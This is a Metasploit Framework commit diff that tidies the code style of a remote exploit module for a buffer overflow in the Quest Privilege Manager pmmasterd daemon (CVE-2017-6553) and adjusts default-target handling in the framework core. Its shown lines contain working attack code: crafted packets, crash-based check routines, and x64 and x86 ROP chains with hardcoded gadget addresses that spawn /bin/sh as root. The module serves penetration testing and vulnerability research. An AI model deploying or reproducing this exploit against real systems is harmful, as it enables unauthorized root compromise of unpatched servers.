Land rapid7#8370, msftidy fixes for quest_pmmasterd_bof

wvu · wvu · commit 69755f6ac372 · 2017-05-11T15:28:56.000-05:00
diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
@@ -287,14 +287,17 @@ def initialize(info = {})
     # to the information hash.
     super(info)
 
-    self.default_target = info['DefaultTarget'] || 0
-
-    # Add an auto-target to the exploit if it doesn't have one
-    if info['Targets'] && info['Targets'].count > 1 && !has_auto_target?(info['Targets'])
-      # Finally, only add the target if there is a remote host option
-      if self.respond_to?(:rhost) && self.respond_to?(:auto_targeted_index)
-        auto = ["Automatic", {'AutoGenerated' => true}.merge(info['Targets'][self.default_target][1])]
-        info['Targets'].unshift(auto)
+    if info.key? 'DefaultTarget'
+      self.default_target = info['DefaultTarget']
+    else
+      self.default_target = 0
+      # Add an auto-target to the exploit if it doesn't have one
+      if info['Targets'] && info['Targets'].count > 1 && !has_auto_target?(info['Targets'])
+        # Finally, only add the target if there is a remote host option
+        if self.respond_to?(:rhost) && self.respond_to?(:auto_targeted_index)
+          auto = ["Automatic", {'AutoGenerated' => true}.merge(info['Targets'][self.default_target][1])]
+          info['Targets'].unshift(auto)
+        end
       end
     end
 
diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
@@ -15,16 +13,18 @@ def initialize(info = {})
       'Name'           => 'Quest Privilege Manager pmmasterd Buffer Overflow',
       'Description'    => %q{
         This modules exploits a buffer overflow in the Quest Privilege Manager,
-        a software used to integrate Active Directory with Linux and Unix systems.
-        The vulnerability exists in the pmmasterd daemon, and can only triggered when
-        the host has been configured as a policy server ( Privilege Manager for Unix
-        or Quest Sudo Plugin). A buffer overflow condition exists when handling
-        requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
-        controlled by the attacker. This module only works against version < 6.0.0-27.
-        Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
-        NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) 
-        as the server refuses connections coming from unprivileged ports, which in most situations 
-        means that root privileges are required.
+        a software used to integrate Active Directory with Linux and Unix
+        systems. The vulnerability exists in the pmmasterd daemon, and can only
+        triggered when the host has been configured as a policy server (
+        Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow
+        condition exists when handling requests of type ACT_ALERT_EVENT, where
+        the size of a memcpy can be controlled by the attacker. This module
+        only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also
+        vulnerable, but not supported by this module (a stack cookie bypass is
+        required). NOTE: To use this module it is required to be able to bind a
+        privileged port ( <=1024 ) as the server refuses connections coming
+        from unprivileged ports, which in most situations means that root
+        privileges are required.
       },
       'Author'         =>
         [
@@ -33,11 +33,10 @@ def initialize(info = {})
       'References'     =>
         [
           ['CVE', '2017-6553'],
-          ['URL' , 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
+          ['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
         ],
       'Payload'        =>
         {
-          'BadChars'    => "",
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
@@ -50,41 +49,49 @@ def initialize(info = {})
         [
           ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
             {
-              :exploit => :exploit_x64,
-              :check => :check_x64
+              exploit: :exploit_x64,
+              check: :check_x64
             }
           ],
           ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',
             {
-              :exploit => :exploit_x86,
-              :check => :check_x86
+              exploit: :exploit_x86,
+              check: :check_x86
             }
           ]
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Apr 09 2017',
-      'DefaultTarget'  => 1
-      ))
-
-    register_options([ Opt::RPORT(12345) ], self.class)
-    register_options( [ Opt::CPORT(rand(1024))], self.class )
+      'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(12345),
+        Opt::CPORT(rand(1024))
+      ]
+    )
   end
 
-  #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog
+  # definitely not stealthy! sends a crashing request, if the socket dies, or
+  # the output is partial it assumes the target has crashed. Although the
+  # daemon spawns a new process for each connection, the segfault will appear
+  # on syslog
   def check
-    unless self.respond_to?(target[:check], true)
+    unless respond_to?(target[:check], true)
       fail_with(Failure::NoTarget, "Invalid target specified")
     end
 
-    return self.send(target[:check])
+    send(target[:check])
   end
 
   def exploit
-    unless self.respond_to?(target[:exploit], true)
+    unless respond_to?(target[:exploit], true)
       fail_with(Failure::NoTarget, "Invalid target specified")
     end
 
-    request = self.send(target[:exploit])
+    request = send(target[:exploit])
 
     connect
     print_status("Sending trigger")
@@ -95,12 +102,12 @@ def exploit
     disconnect
   end
 
-  #server should crash after parsing the packet, partial output is returned
+  # server should crash after parsing the packet, partial output is returned
   def check_x64
     head = [ 0x26c ].pack("N")
     head << [ 0x700 ].pack("N")
     head << [ 0x700 ].pack("N")
-    head << "\x00"*68
+    head << "\x00" * 68
 
     body = "PingE4.6 .0.0.27"
     body << rand_text_alpha(3000)
@@ -111,19 +118,19 @@ def check_x64
     print_status("Sending trigger")
     sock.put(request)
     res = sock.timed_read(1024, 1)
-    if res.match("Pong4$")
+    if res.match? "Pong4$"
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Unknown
     end
   end
 
-  #server should crash while parsing the packet, with no output
+  # server should crash while parsing the packet, with no output
   def check_x86
     head = [ 0x26c ].pack("N")
     head << [ 0x700 ].pack("N")
     head << [ 0x700 ].pack("N")
-    head << "\x00"*68
+    head << "\x00" * 68
 
     body = rand_text_alpha(3000)
 
@@ -133,7 +140,7 @@ def check_x86
     print_status("Sending trigger")
     sock.put(request)
     begin
-      res = sock.timed_read(1024, 1)
+      sock.timed_read(1024, 1)
       return Exploit::CheckCode::Unknown
     rescue ::Exception
       return Exploit::CheckCode::Appears
@@ -144,38 +151,37 @@ def exploit_x64
     head = [ 0x26c ].pack("N")
     head << [ 0x700 ].pack("N")
     head << [ 0x700 ].pack("N")
-    head << "\x00"*68
+    head << "\x00" * 68
 
-    #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+    # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
     ropchain = [
-          0x408f88,   # pop rdi, ret
-          0x4FA215,   # /bin/sh
-          0x40a99e,   # pop rsi ; ret
-          0,          # argv  @rsi
-          0x40c1a0,   # pop rax, ret
-          0,          # envp @rax
-          0x48c751,   # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
-          0xcacc013,  # padding
-          0x408a98,   # execve,
-          0
+      0x408f88,   # pop rdi, ret
+      0x4FA215,   # /bin/sh
+      0x40a99e,   # pop rsi ; ret
+      0,          # argv  @rsi
+      0x40c1a0,   # pop rax, ret
+      0,          # envp @rax
+      0x48c751,   # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
+      0xcacc013,  # padding
+      0x408a98,   # execve,
+      0
     ].pack("Q*")
 
     body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
     body << rand_text_alpha(1600)
     body << ropchain
-    body << rand_text_alpha(0x700 - body.size())
-
-    return head + body
+    body << rand_text_alpha(0x700 - body.size)
 
+    head + body
   end
 
   def exploit_x86
     head = [ 0x26c ].pack("N")
     head << [ 0x108 ].pack("N")
     head << [ 0xcc ].pack("N")
-    head << "\x00"*68
+    head << "\x00" * 68
 
-    #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
+    # rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
     ropchain = [
       0x8093262,  # ret
       0x73,       # cs reg
@@ -192,15 +198,13 @@ def exploit_x86
     body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
     body << rand_text_alpha(104)
     body << ropchain
-    body << rand_text_alpha(0xb4 - body.size())
+    body << rand_text_alpha(0xb4 - body.size)
     body << [0x50].pack("V")
-    body << rand_text_alpha(0xc4 - body.size())
+    body << rand_text_alpha(0xc4 - body.size)
     body << [pivotback].pack("V")
     body << [writable].pack("V")
-    body << rand_text_alpha(0x108 - body.size())
+    body << rand_text_alpha(0x108 - body.size)
 
-    return head + body
+    head + body
   end
-
 end
-
